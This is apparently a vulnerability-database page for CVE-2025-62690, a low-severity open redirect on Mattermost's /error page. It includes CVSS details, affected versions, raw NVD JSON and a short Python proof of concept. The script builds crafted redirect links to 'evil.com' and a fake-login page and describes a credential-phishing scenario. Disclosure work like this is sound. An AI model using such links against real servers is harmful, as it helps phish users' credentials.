Security Vulnerability Report
中文
CVE-2025-62690 CVSS 3.1 LOW

CVE-2025-62690

Published: 2025-12-17 13:15:59
Last Modified: 2025-12-29 18:55:05
Source: [email protected]

Description

Mattermost versions 10.11.x <= 10.11.4 fail to validate redirect URLs on the /error page, which allows an attacker to redirect a victim to a malicious site via a crafted link opened in a new tab.

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
Mattermost 10.11.0
Mattermost 10.11.1
Mattermost 10.11.2
Mattermost 10.11.3
Mattermost 10.11.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62690 PoC - Mattermost Open Redirect # Target: Mattermost server with vulnerable /error page import urllib.parse def generate_malicious_url(target_url, redirect_target): """ Generate malicious URL for open redirect attack Args: target_url: Target Mattermost server URL (e.g., 'https://mattermost.example.com') redirect_target: Malicious redirect target URL Returns: Malicious URL that exploits the open redirect vulnerability """ # Encode the redirect target to obfuscate encoded_redirect = urllib.parse.quote(redirect_target, safe='') # Construct the malicious URL pointing to /error page malicious_url = f"{target_url}/error?redirect={encoded_redirect}" return malicious_url def generate_phishing_scenario(): """ Generate phishing attack scenario URLs """ mattermost_target = "https://mattermost.company.com" phishing_site = "https://fake-login.malicious-site.com" # Generate the exploit URL exploit_url = generate_malicious_url(mattermost_target, phishing_site) # Alternative: Direct parameter injection alt_exploit_url = f"{mattermost_target}/error?redirect=//evil.com" return { "description": "Open Redirect Attack via /error page", "step1": f"Attacker crafts: {exploit_url}", "step2": "Victim receives link via email/chat", "step3": "Victim opens link in new tab", "step4": "Browser shows legitimate Mattermost domain", "step5": f"Browser redirects to: {phishing_site}", "result": "Victim enters credentials on phishing site" } # Example usage if __name__ == "__main__": target = "https://mattermost.company.com" malicious = "https://attacker-controlled-site.com/fake-login" exploit_url = generate_malicious_url(target, malicious) print(f"Exploit URL: {exploit_url}") scenario = generate_phishing_scenario() for key, value in scenario.items(): print(f"{key}: {value}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62690", "sourceIdentifier": "[email protected]", "published": "2025-12-17T13:15:58.510", "lastModified": "2025-12-29T18:55:05.180", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.4 fail to validate redirect URLs on the /error page, which allows an attacker to redirect a victim to a malicious site via a crafted link opened in a new tab."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.5", "matchCriteriaId": "A8368192-621C-4043-827E-DB4F6946AD92"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.